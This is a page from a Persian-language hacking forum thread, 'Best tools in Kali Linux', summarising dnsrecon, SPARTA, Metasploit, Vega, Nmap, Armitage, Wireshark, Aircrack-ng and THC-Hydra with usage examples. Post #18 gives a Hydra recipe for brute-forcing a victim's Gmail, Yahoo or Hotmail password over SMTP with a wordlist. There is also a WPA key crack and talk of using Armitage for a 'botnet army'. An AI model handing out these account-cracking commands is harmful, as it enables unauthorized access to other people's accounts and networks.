رتبه موضوع:
  • 1 رای - 4 میانگین
  • 1
  • 2
  • 3
  • 4
  • 5
Best tools in Kali Linux
#10
dnsrecon – A powerful DNS enumeration script

ابزاری مفید برای اسکن DNS و شناسایی  subdomains

کد:
https://tools.kali.org/information-gathering/dnsrecon


usage :
کد:
root@kali:~# dnsrecon -d example.com -D /usr/share/wordlists/dnsmap.txt -t std --xml dnsrecon.xml
[list]
[*]Performing General Enumeration of Domain:
[*]DNSSEC is configured for example.com

[/list]
ویدیو آموزشی

کد:
https://asciinema.org/a/31190/embed?
------------=========تاپیک سوالات کاربران==========------------

http://forum.iranhack.com/thread-3197.html

------------========Hash-Cracking Requests========------------

http://forum.iranhack.com/thread-3204.html
پاسخ }}
سپاس شده توسط:
#11
sparta – Network Infrastructure Penetration Testing Tool

SPARTA is a python GUI application that simplifies network infrastructure penetration testing by aiding the penetration tester in the scanning and enumeration phase. It allows the tester to save time by having point-and-click access to their toolkit and by displaying all tool output in a convenient way. If less time is spent setting up commands and tools, more time can be spent focusing on analysing results.


[عکس: sparta-07-brute.png]
کد:
https://tools.kali.org/information-gathering/sparta
------------=========تاپیک سوالات کاربران==========------------

http://forum.iranhack.com/thread-3197.html

------------========Hash-Cracking Requests========------------

http://forum.iranhack.com/thread-3204.html
پاسخ }}
سپاس شده توسط:
#12
Icon35 
Metasploit Framework

In keeping with the Kali Linux Network Services Policy, no network services, including database services, run on boot as a default, so there are a couple of steps that need to be taken in order to get Metasploit up and running with database support.

Launch msfconsole in Kali
کد:
msfconsole
edu
کد:
https://www.youtube.com/watch?v=gWKyFYMY_Pk
https://www.youtube.com/watch?v=u6_lbEFx3Qw
------------=========تاپیک سوالات کاربران==========------------

http://forum.iranhack.com/thread-3197.html

------------========Hash-Cracking Requests========------------

http://forum.iranhack.com/thread-3204.html
پاسخ }}
سپاس شده توسط:
#13
Icon35 
Vega
Vega is a free and open source scanner and testing platform to test the security of web applications. Vega can help you find and validate SQL Injection, Cross-Site Scripting (XSS), inadvertently disclosed sensitive information, and other vulnerabilities. It is written in Java, GUI based, and runs on Linux, OS X, and Windows.

Vega includes an automated scanner for quick tests and an intercepting proxy for tactical inspection. The Vega scanner finds XSS (cross-site scripting), SQL injection, and other vulnerabilities. Vega can be extended using a powerful API in the language of the web: Javascript.

    Automated Crawler and Vulnerability Scanner
    Consistent UI
    Website Crawler
    Intercepting Proxy
    SSL MITM
    Content Analysis
    Extensibility through a Powerful Javascript Module API
    Customizable alerts
    Database and Shared Data Model
کد:
vega Usage Example(s)
root@kali:~# vega
ابزاری گرافیکی و متن باز برای اسکن آسیب پذیری های نرم افزارهای تحت وب

[عکس: vega.png]
------------=========تاپیک سوالات کاربران==========------------

http://forum.iranhack.com/thread-3197.html

------------========Hash-Cracking Requests========------------

http://forum.iranhack.com/thread-3204.html
پاسخ }}
سپاس شده توسط:
#14
Icon35 
Nmap

انمپ یک ابزار رایگان و متن باز است که برای کاوش و بررسی های امنیتی در شبکه به کار می‌رود . بسیاری از سیستم‌ها و مدیران شبکه نیز این ابزار را برای انجام وظایفی مثل اکتشاف شبکه ، مدیریت برنامه ارتقا سرویس ها و مانیتور میزبان ها یا آپتایم سرویس ها مفید می‌دانند .

Nmap aka network mapper is a pretty simple tool in kali linux that allows you to scan a system or a network. Nmap allows you to scan open ports, running services, netbios, os detection etc. Nmap use various type of detection technique to evade IP filters firewalls. Nmap has both command line interface and GUI and supports almost all platforms including windows and mac. This the tool that you have to use before attacking a system or a server.
 
nmap Usage Example
کد:
root@kali:~# nmap -v -A -sV 192.168.1.1

Starting Nmap 6.45 ( http://nmap.org ) at 2014-05-13 18:40 MDT
NSE: Loaded 118 scripts for scanning.
NSE: Script Pre-scanning.
Initiating ARP Ping Scan at 18:40
Scanning 192.168.1.1 [1 port]
Completed ARP Ping Scan at 18:40, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 18:40
Completed Parallel DNS resolution of 1 host. at 18:40, 0.00s elapsed
Initiating SYN Stealth Scan at 18:40
Scanning router.localdomain (192.168.1.1) [1000 ports]
Discovered open port 53/tcp on 192.168.1.1
Discovered open port 22/tcp on 192.168.1.1
Discovered open port 80/tcp on 192.168.1.1
Discovered open port 3001/tcp on 192.168.1.1
------------=========تاپیک سوالات کاربران==========------------

http://forum.iranhack.com/thread-3197.html

------------========Hash-Cracking Requests========------------

http://forum.iranhack.com/thread-3204.html
پاسخ }}
سپاس شده توسط:
#15
Icon35 
Armitage
Armitage is basically a graphical version of metasploit framework. Most of the newbie hackers find it difficult to use metasploit since its a command line interface. Armitage offers a cool GUI for these guys. We can find an exploit or auxiliary module with a much easier user interface, somewhat like a file explorer. all hacked devices as well as scanned devices are visible like a large icon interface and very easy to launch attack against multiple systems in a single click. For more advanced usage console window is also available on the bottom. Armitage helps really well when you want to create or control a botnet army. when you want to take down the whole network of systems, armitage would be a great choice
نسخه گرافیکی متااسپلویت

[عکس: armitage.png]
armitage Usage Example
کد:
root@kali:~# armitage
[*] Starting msfrpcd for you.
 
https://tools.kali.org/exploitation-tools/armitage
------------=========تاپیک سوالات کاربران==========------------

http://forum.iranhack.com/thread-3197.html

------------========Hash-Cracking Requests========------------

http://forum.iranhack.com/thread-3204.html
پاسخ }}
سپاس شده توسط: B3hz4d4
#16
Icon35 
wireshark – network traffic analyzer
Wireshark is the world’s foremost network protocol analyzer. It lets you see what’s happening on your network at a microscopic level. It is the de facto (and often de jure) standard across many industries and educational institutions. Wireshark development thrives thanks to the contributions of networking experts across the globe. It is the continuation of a project that started in 1998.
کد:
Wireshark has a rich feature set which includes the following:

Deep inspection of hundreds of protocols, with more being added all the time
Live capture and offline analysis
Standard three-pane packet browser
Multi-platform: Runs on Windows, Linux, OS X, Solaris, FreeBSD, NetBSD, and many others
Captured network data can be browsed via a GUI, or via the TTY-mode TShark utility
The most powerful display filters in the industry
Rich VoIP analysis
Capture files compressed with gzip can be decompressed on the fly
Live data can be read from Ethernet, IEEE 802.11, PPP/HDLC, ATM, Bluetooth, USB, Token Ring, Frame Relay, FDDI, and others (depending on your platform)
Coloring rules can be applied to the packet list for quick, intuitive analysis
Output can be exported to XML, PostScript®, CSV, or plain text
Decryption support for many protocols, including IPsec, ISAKMP, Kerberos, SNMPv3, SSL/TLS, WEP, and WPA/WPA2
Read/write many different capture file formats: tcpdump (libpcap), Pcap NG, Catapult DCT2000, Cisco Secure IDS iplog, Microsoft Network Monitor, Network * General Sniffer® (compressed and uncompressed), Sniffer® Pro, and NetXray®, Network Instruments Observer, NetScreen snoop, Novell LANalyzer, RADCOM WAN/LAN Analyzer, Shomiti/Finisar Surveyor, Tektronix K12xx, Visual Networks Visual UpTime, WildPackets EtherPeek/TokenPeek/AiroPeek, and many others
wireshark Usage Example
کد:
root@kali:~# wireshark
 
[عکس: wireshark.png]

ابزاری مناسب برای اسنیف شبکه

نسخه ویندوزی :
کد:
https://www.wireshark.org/download.html

------------=========تاپیک سوالات کاربران==========------------

http://forum.iranhack.com/thread-3197.html

------------========Hash-Cracking Requests========------------

http://forum.iranhack.com/thread-3204.html
پاسخ }}
سپاس شده توسط: B3hz4d4
#17
Aircrack-ng
Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured. It implements the standard FMS attack along with some optimizations like KoreK attacks, as well as the all-new PTW attack, thus making the attack much faster compared to other WEP cracking tools
ابزاری مفید برای کرک wifi

usage :
کد:
root@kali:~# aircrack-ng -w /usr/share/doc/aircrack-ng/examples/password.lst /root/wpa.cap

Aircrack-ng 1.2 rc4

[00:00:00] 232/233 keys tested (1992.58 k/s)

Time left: 0 seconds 99.57%

KEY FOUND! [ biscotte ]


Master Key : CD D7 9A 5A CF B0 70 C7 E9 D1 02 3B 87 02 85 D6
39 E4 30 B3 2F 31 AA 37 AC 82 5A 55 B5 55 24 EE

Transient Key : 33 55 0B FC 4F 24 84 F4 9A 38 B3 D0 89 83 D2 49
73 F9 DE 89 67 A6 6D 2B 8E 46 2C 07 47 6A CE 08
AD FB 65 D6 13 A9 9F 2C 65 E4 A6 08 F2 5A 67 97
D9 6F 76 5B 8C D3 DF 13 2F BC DA 6A 6E D9 62 CD

EAPOL HMAC : 28 A8 C8 95 B7 17 E5 72 27 B6 A7 EE E3 E5 34 45
https://tools.kali.org/wireless-attacks/aircrack-ng
------------=========تاپیک سوالات کاربران==========------------

http://forum.iranhack.com/thread-3197.html

------------========Hash-Cracking Requests========------------

http://forum.iranhack.com/thread-3204.html
پاسخ }}
سپاس شده توسط: B3hz4d4
#18
Icon35 
THC-Hydra
Hydra is a parallelized login cracker which supports numerous protocols to attack. It is very fast and flexible, and new modules are easy to add. This tool makes it possible for researchers and security consultants to show how easy it would be to gain unauthorized access to a system remotely.

It supports: Cisco AAA, Cisco auth, Cisco enable, CVS, FTP, HTTP(S)-FORM-GET, HTTP(S)-FORM-POST, HTTP(S)-GET, HTTP(S)-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MySQL, NNTP, Oracle Listener, Oracle SID, PC-Anywhere, PC-NFS, POP3, PostgreSQL, RDP, Rexec, Rlogin, Rsh, SIP, SMB(NT), SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.

hydra Usage Example
کد:
root@kali:~# hydra -l root -P /usr/share/wordlists/metasploit/unix_passwords.txt -t 6 ssh://192.168.1.123
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2014-05-19 07:53:33
[DATA] 6 tasks, 1 server, 1003 login tries (l:1/p:1003), ~167 tries per task
[DATA] attacking service ssh on port 22
 
کد:
hydra smtp.victimsemailserver.com smtp -l victimsaccountname -P ‘/root/Desktop/rockyou.txt’ -s portnumber -S -v -V
 
کد:
PORT MAILER SMTP ADDRESS OF MAILER .


Yahoo
Server SMTP.mail.Yahoo.com
Port 465


Gmail
Server smtp.Gmail.com
Port 465


Hotmail

Server smtp. Live.com
Port 587

NOW YOU CAN WRITE THIS CODE AS :
hydra -l example@gmail.com -P /root/Desktop/wordlist.txt -s 465 -S -v -V -t 1 smtp.gmail.com smtp
------------=========تاپیک سوالات کاربران==========------------

http://forum.iranhack.com/thread-3197.html

------------========Hash-Cracking Requests========------------

http://forum.iranhack.com/thread-3204.html
پاسخ }}
سپاس شده توسط:


موضوعات مشابه ...
موضوع نویسنده پاسخ بازدید آخرین ارسال
Icon36 GoogleDiggity - Google Hacking Tools Mr.XpR 0 452 29 شهريور 1394، 06:10 عصر
آخرین ارسال: Mr.XpR
Icon30 Katoolin – Automatically install all Kali Linux tools Mr.X2 0 431 1 شهريور 1394، 06:44 صبح
آخرین ارسال: Mr.X2
  NetCat Linux Version Moji.Rider 0 471 25 اسفند 1393، 09:52 صبح
آخرین ارسال: Moji.rider
Icon36 Sqlmap: Auto SQL Injection (Tools + Video) Irhblackhat 0 738 19 دي 1393، 08:29 صبح
آخرین ارسال: Irhblackhat
Icon35 CTF Tools Page black-sec 0 654 15 مهر 1393، 05:30 عصر
آخرین ارسال: black-sec
Icon30 Kali Linux additional tools installation script Mr.X2 0 959 23 شهريور 1393، 11:20 صبح
آخرین ارسال: Mr.X2
Icon36 Tools Scanner X3 Benyamin 0 800 17 شهريور 1393، 10:45 صبح
آخرین ارسال: Benyamin
  Directory Scan tools AL1R3Z4 0 815 8 مهر 1392، 09:55 صبح
آخرین ارسال: AL1R3Z4
  Net Tools 5.0.70 AIO 411r324 0 744 12 مرداد 1392، 03:29 عصر
آخرین ارسال: 411r324

پرش به انجمن:


کاربران در حال بازدید این موضوع: 1 مهمان